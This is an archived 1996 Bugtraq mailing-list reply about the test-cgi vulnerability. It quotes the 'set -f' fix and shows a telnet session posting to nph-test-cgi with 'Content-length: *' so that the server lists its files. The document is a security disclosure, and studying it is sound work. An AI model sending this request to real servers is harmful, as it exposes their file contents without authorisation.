Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1996_4

Bugtraq archives for 4th quarter (Oct-Dec) 1996: Re: Vulnerability in test-cgi

Re: Vulnerability in test-cgi

Evgene Ilyine (esiptc.spbu.ru)
Tue, 17 Dec 1996 12:24:32 +0300

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Evgene Ilyine: "vixie cron intel BSD exploit code"
Previous message: Yuri Volobuev: "Irix: scanners hole"
In reply to: Joe Zbiciak: "Re: Vulnerability in test-cgi"

On Tue, 3 Dec 1996, Joe Zbiciak wrote:

> string.  Therefore it's still vulnerable in it's default configuration.
> Adding "set -f" as the second line of the script closes the hole completely.

  Yes -- otherwise this hole would looks like a virus, here is anoter
mutation:

<esisnark:~> (268) telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
post /cgi-bin/nph-test-cgi http/1.0
Content-type: x
Content-length: *

.. skiped
CONTENT_LENGTH = ( here you'll get a list of files)

=============================================================
postmasterspbu.ru                              Evgene Ilyine
http://www.ptc.spbu.ru/~esi               Work phone:428-4527
=============================================================

Next message: Evgene Ilyine: "vixie cron intel BSD exploit code"
Previous message: Yuri Volobuev: "Irix: scanners hole"
In reply to: Joe Zbiciak: "Re: Vulnerability in test-cgi"